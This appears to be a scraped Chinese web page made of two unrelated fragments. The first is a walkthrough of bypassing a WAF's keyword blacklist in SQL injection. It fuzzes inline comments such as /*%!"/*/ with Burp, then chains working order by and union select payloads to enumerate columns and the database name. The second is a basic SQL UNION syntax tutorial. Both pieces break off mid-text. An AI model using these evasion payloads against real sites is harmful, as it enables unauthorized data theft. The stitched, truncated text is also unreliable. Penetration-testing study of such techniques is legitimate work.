union

sql注入内联注释过waf 正常输入: 1 然后尝试: -1 order by 被拦截 然后单独尝试 order 或者 by 单独的order或者by并没有被拦截，内联注释干扰黑名单检测 -1/**/order/**/by 3 只是简单的 /**/ 也被过滤了，那么就在 /**/ 中间加干扰 用 -1 and 1=1 来进行测试，burp抓包，然后在被过滤的关键字前后加注释，注释中间用§ §来进行爆破定点，配置如下 字符集设置一些字符数字字母随机组合干扰 然后进行爆破 响应没有显示waf的为爆破成功的结果 此处采用payload1来进行内联注释的干扰 /*%!"/*/ -1/*%!"/*/and/*%!"/*/1=1 由此看出，此时and并没有被waf黑名单检测到 然后进行order by查询 -1/*%!"/*/order/*%!"/*/by 3 -1/*%!"/*/order/*%!"/*/by 4 由此可得，查询3项数据 然后union select查询 -1/*%!"/*/union/*%!"/*/select 1,2,3 2和3处可以查询自己想要的信息 查database：此处database单个单词没被加黑名单，database()被加黑名单了，那就在database和()中间加注释： -1/*%!"/*/union/*%!"/*/select+1,/*%!"/*

SQL UNION 操作符 UNION 操作符用于合并两个或多个 SELECT 语句的结果集。 请注意，UNION 内部的 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每条 SELECT 语句中的列的顺序必须相同。 SQL UNION 语法 SELECT column_name ( s ) FROM table_name1 UNION SELECT column_name ( s ) FROM table_name2 注释：默认地，UNION 操作符选取不同的值。如果允许重复的值，请使用 UNION ALL。 SQL UNION ALL 语法 SELECT column_name ( s ) FROM table_name1 UNION ALL SELECT column_name ( s ) FROM table_name2 另外，UNION 结果集中的列名总是等于 UNION 中第一个 SELECT 语句中的列名。 下面的例子中使用的原始表： Employees_China: E_ID E_Name 01 Zhang , Hua 02 Wang , Wei 03 Carter , Thomas 04 Yang , Ming Employees_USA: E_ID E_Name 01 Adams , John 02 Bush , George 03